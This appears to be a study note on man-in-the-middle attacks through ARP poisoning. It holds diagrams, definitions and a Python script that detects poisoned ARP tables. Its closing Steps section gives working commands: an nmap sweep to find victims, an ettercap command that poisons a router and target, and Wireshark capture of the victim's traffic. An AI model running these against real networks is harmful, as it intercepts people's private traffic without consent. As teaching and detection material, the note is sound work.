# MiTM Attack

## Installations

```bash
sudo apt install wireshark
sudo apt install nmap
sudo apt install ettercap-text-only
```
## Theories

### Old Router Communication Method

```mermaid
flowchart LR
Z((Internet)) -->|Laptop Msg| A(Router);
A -->|Laptop Msg| B[Laptop];
A -->|Laptop Msg| C[Phone];
A -->|Laptop Msg| D[Raspi];
subgraph "Hub"
A;
end
```

This old communication method is easy to hack, since the hub repeats every message to every connected host regardless of its destination. Sniffing (capturing) network traffic was therefore easy in the past.
### Communication with MAC addresses

```mermaid
flowchart LR
Z((Internet)) -->|Laptop Msg| A(Router);
A --- C[Phone];
subgraph "Hub, Wireless Access Point"
subgraph "MAC filtering"
A -->|Laptop Msg| B[Laptop];
end
end
```

Here the hub or access point forwards each frame only toward the MAC address it is addressed to, so the Phone no longer sees the Laptop's message; a host normally receives only the traffic meant for itself.
## ARP Poisoning and MiTM attack

- Address Resolution Protocol (ARP) is the procedure for mapping a dynamic Internet Protocol address (IP address) to the permanent physical address of a machine in a local area network (LAN). The physical machine address is also known as a Media Access Control (MAC) address.
- Man-in-the-middle Attack (MiTM): an attack in which a third party inserts itself between two communicating hosts and relays their traffic, so it can read or alter messages while both ends believe they are talking to each other directly.
- Sniffing is the process of monitoring and capturing all the packets passing through a given network using sniffing tools.
Originally (before the attack):

```mermaid
flowchart LR
A(Router) -->|"msg \n private ip: 192.168.x.5 \n mac: ABCD"| B[Victim];
B -->|"request \n private ip: 192.168.x.1 \n mac: AAAA"| A;
subgraph "ip: 192.168.x.1 \n mac: AAAA"
A
end
subgraph "ip: 192.168.x.5 \n mac: ABCD"
B
end
```
After the MiTM attack:

```mermaid
flowchart LR
A(Router) -->|"msg \n private ip: 192.168.x.5 \n mac: BBBB"| C[Hacker];
C -->|"msg \n private ip: 192.168.x.5 \n mac: ABCD"| B[Victim];
subgraph "ip: 192.168.x.1 \n mac: AAAA"
A
end
subgraph "ip: 192.168.x.5 \n mac: ABCD"
B
end
subgraph "ip: 192.168.x.10 \n mac: BBBB"
C
end
B -->|"request \n private ip: 192.168.x.1 \n mac: BBBB"| C;
C -->|"request \n private ip: 192.168.x.1 \n mac: AAAA"| A;
```
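The two diagrams above show exactly what a defender can look for: from the victim's point of view the gateway IP (192.168.x.1) suddenly resolves to the attacker's MAC (BBBB), and that one MAC now answers for two IPs (.1 and .10). The script below is an added example (not part of the original notes) that watches for both symptoms by comparing a trusted baseline of the host's ARP/neighbour table with a later snapshot. The two snapshots are constructed sample data in the line format of Linux `ip neigh show`; on a live host you would feed the real output of that command into `parse_neigh()`, and the `snapshot_live()` helper does that for you.

```python
"""ARP-table watcher: flags the symptoms of ARP poisoning seen in the diagrams
(gateway MAC changing, one MAC answering for several IPs).

Added example, not part of the original notes. BASELINE and POISONED are
constructed sample snapshots in the format of `ip neigh show`.
"""
import re
import subprocess
from collections import defaultdict

# One line of `ip neigh show`, e.g.
#   192.168.1.1 dev wlan0 lladdr aa:aa:aa:aa:aa:aa REACHABLE
# Lines without "lladdr" (FAILED / INCOMPLETE entries) do not match and are skipped.
NEIGH_RE = re.compile(
    r"^(?P<ip>\d+\.\d+\.\d+\.\d+) dev (?P<dev>\S+) lladdr "
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})",
    re.IGNORECASE,
)

# Constructed snapshot taken while the table is known-good (victim's view).
BASELINE = """
192.168.1.1 dev wlan0 lladdr aa:aa:aa:aa:aa:aa REACHABLE
192.168.1.5 dev wlan0 lladdr ab:cd:ab:cd:ab:cd STALE
192.168.1.10 dev wlan0 lladdr bb:bb:bb:bb:bb:bb STALE
"""

# Constructed snapshot after the poisoning in the second diagram: the gateway
# .1 now maps to BBBB, the MAC that also belongs to .10.
POISONED = """
192.168.1.1 dev wlan0 lladdr bb:bb:bb:bb:bb:bb REACHABLE
192.168.1.5 dev wlan0 lladdr ab:cd:ab:cd:ab:cd STALE
192.168.1.10 dev wlan0 lladdr bb:bb:bb:bb:bb:bb STALE
192.168.1.7 dev wlan0 FAILED
"""


def parse_neigh(text):
    """Return {ip: mac} from `ip neigh show` output (MACs lower-cased)."""
    table = {}
    for line in text.strip().splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            table[m.group("ip")] = m.group("mac").lower()
    return table


def snapshot_live():
    """Read the current neighbour table from the running Linux host."""
    out = subprocess.run(["ip", "neigh", "show"], capture_output=True,
                         text=True, check=True).stdout
    return parse_neigh(out)


def find_anomalies(baseline, current, gateway_ip):
    """Compare a trusted baseline with a later snapshot.

    Returns a list of (kind, detail) tuples:
      gateway-mac-changed     the gateway IP now resolves to a different MAC
      mac-changed             any other IP now resolves to a different MAC
      mac-claims-multiple-ips one MAC is bound to several IPs, i.e. a host is
                              answering ARP for addresses it does not own
    """
    findings = []
    for ip, mac in current.items():
        old = baseline.get(ip)
        if old is not None and old != mac:
            kind = "gateway-mac-changed" if ip == gateway_ip else "mac-changed"
            findings.append((kind, f"{ip}: {old} -> {mac}"))

    ips_by_mac = defaultdict(list)
    for ip, mac in current.items():
        ips_by_mac[mac].append(ip)
    for mac, ips in sorted(ips_by_mac.items()):
        if len(ips) > 1:
            findings.append(("mac-claims-multiple-ips",
                             f"{mac}: {', '.join(sorted(ips))}"))
    return findings


if __name__ == "__main__":
    base = parse_neigh(BASELINE)
    for kind, detail in find_anomalies(base, parse_neigh(POISONED), "192.168.1.1"):
        print(f"[{kind}] {detail}")
```

Run it periodically against `snapshot_live()` and alert on any finding. A `gateway-mac-changed` event on a network whose gateway hardware does not change is the strongest signal; as a mitigation, a permanent neighbour entry for the gateway (`ip neigh replace <gateway ip> lladdr <gateway mac> dev wlan0 nud permanent`) keeps the kernel from accepting unsolicited ARP replies for that address.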
## Steps

- Identify the victim's MAC address and IP address.

```bash
nmap -sn 192.168.1.0/24
```

- Swap addresses (poison the ARP tables of the router and the target, as in the diagram above).

```bash
sudo ettercap -T -S -i wlan0 -M arp:remote /192.168.1.1// /target_ip//
```

- Start Wireshark to see the captured packets. Select `wlan0`, then apply the display filter `ip.addr == target_ip`.

```bash
sudo wireshark
```
## References

- Understanding IP and MAC Addresses: What Are They Good For?
- Address Resolution Protocol (ARP)
- Wiki -- Man-in-the-middle attack
- Ethical Hacking - Sniffing